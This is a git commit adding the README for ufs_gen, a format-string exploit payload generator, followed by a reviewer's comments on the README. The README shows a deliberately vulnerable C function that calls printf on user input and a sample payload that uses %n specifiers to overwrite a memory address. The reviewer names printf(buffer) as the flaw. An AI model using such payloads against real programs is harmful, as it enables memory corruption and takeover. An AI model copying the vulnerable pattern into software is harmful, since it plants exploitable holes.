From b3122c208b43e8dd775b49c5023f728e14e0156e Mon Sep 17 00:00:00 2001 From: Olivier Gayot Date: Sun, 26 Jan 2014 15:05:01 +0000 Subject: initial commit --- README | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 README (limited to 'README') diff --git a/README b/README new file mode 100644 index 0000000..b2d9679 --- /dev/null +++ b/README @@ -0,0 +1,51 @@ +ufs_gen +======= + +This software allows you to generate a payload which may override an address +with the value of your choice. + +The syntax is quite simple: + +There are three parameters needed for the program to run correctly. + +stackidx: this parameter specifies how many dwords you need to access the +beginning of your buffer (or payload). + +override: the address to override + +with: the value to inject at the address overriden + +This software is intended to work with an ELF32 generated by a typical code. + +example: + +int function(const char *payload) +{ + char buffer[BUFSIZ]; + + strncpy(buffer, payload, sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + printf(buffer); + + return 0; +} + +The support of ELF64 and other formats is intended but not written yet. +Although the option 'addrsize' might already be used to specify if an address +is not 4 bytes long, there is very few chances that it would work correctly. + +The support of printf(payload) directly (i.e. without a temporary buffer) is +also planned. + +Example +======= + +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 +D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n + +License +======= + +This software is free software covered by the GPL license v2. You should +read the COPYING file to understand what is implied. -- cgit v1.2.3
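Review bot: The parameter list near the top of the README says three parameters are needed (stackidx, override, with), yet the ELF64 paragraph refers to an 'addrsize' option that is never described. Either document it alongside the others, with its accepted values and a note that it is experimental, or drop the mention until it works. In the C snippet under "example:", the README should state outright that the call "printf(buffer);" is the uncontrolled format string the generated payload depends on, and that "printf("%s", buffer);" is the corrected form, so nobody reads the function as a template to copy. The sample output in the "Example" section contains raw address bytes, which do not render reliably in a text file; a sentence saying so would explain the odd leading characters. Minor: the descriptive text would read better with "overwrite"/"overwritten" in place of "override"/"overriden", the README carries both an "example:" label and an "Example" section, and "GPL license v2" does not say whether it means version 2 only or version 2 or later.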